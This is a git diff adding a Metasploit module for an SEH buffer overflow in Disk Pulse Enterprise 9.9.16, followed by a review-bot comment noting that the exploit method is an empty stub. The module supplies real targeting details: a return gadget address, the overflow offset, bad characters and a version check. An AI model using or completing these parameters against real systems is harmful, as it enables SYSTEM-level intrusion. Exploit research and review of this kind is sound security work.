diff --git a/modules/exploits/windows/http/disk_pulse_enterprise_get.rb b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
new file mode 100644
index 0000000000..c3f326feb5
--- /dev/null
+++ b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
@@ -0,0 +1,77 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::Remote::Egghunter
+include Msf::Exploit::Remote::Seh
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Disk Pulse Enterprise Login Buffer Overflow',
+'Description' => %q{
+This module exploits an SEH buffer overflow in Disk Pulse Enterprise
+9.9.16. If a malicious user sends a malicious HTTP GET request,
+it is possible to execute a payload that would run under the Windows
+NT AUTHORITY\SYSTEM account.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Chance Johnson', # module - hackback.sh - albatross@loftwing.net
+'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
+],
+'References' =>
+[
+[ 'EDB', '42560' ]
+],
+'DefaultOptions' =>
+{
+'EXITFUNC' => 'none'
+},
+'Platform' => 'win',
+'Payload' =>
+{
+'BadChars' => "\x00\x0a\x0d\x26"
+},
+'Targets' =>
+[
+[ 'Disk Pulse Enterprise 9.9.16',
+{
+'Ret' => 0x10013AAA, # pop ebp # pop ebx # ret 0x04 - libspp.dll
+'Offset' => 12600
+}
+],
+],
+'Privileged' => true,
+'DisclosureDate' => 'Oct 03 2016',
+'DefaultTarget' => 0))
+
+register_options([Opt::RPORT(80)], self.class)
+
+end
+
+def check
+res = send_request_cgi({
+'uri' => '/',
+'method' => 'GET'
+})
+
+if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.9\.16/
+return Exploit::CheckCode::Appears
+end
+
+return Exploit::CheckCode::Safe
+end
+
+def exploit
+
+
+end
+end
\ No newline at end of file
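Review bot: The `exploit` method at the end of the hunk is an empty stub, so the module declares `ExcellentRanking`, an SEH `Ret` gadget and a 12600-byte `Offset`, and mixes in `Egghunter` and `Seh`, yet never builds or sends the overflowing GET request; running it will return silently without delivering a payload, and nothing in the file justifies the Excellent rank. Until the body is written it should fail loudly rather than pretend to work, e.g. `fail_with(Failure::Unknown, 'exploit body not yet implemented')`, or the module should not be merged in this state. In `check`, the `and` operators bind lower than assignment and are a known precedence trap; the conventional form is `if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/`, which reads the same here but avoids surprises when the condition is later refactored. The `self.class` argument to `register_options` appears to be the legacy form; confirm it is still accepted by the framework version this targets.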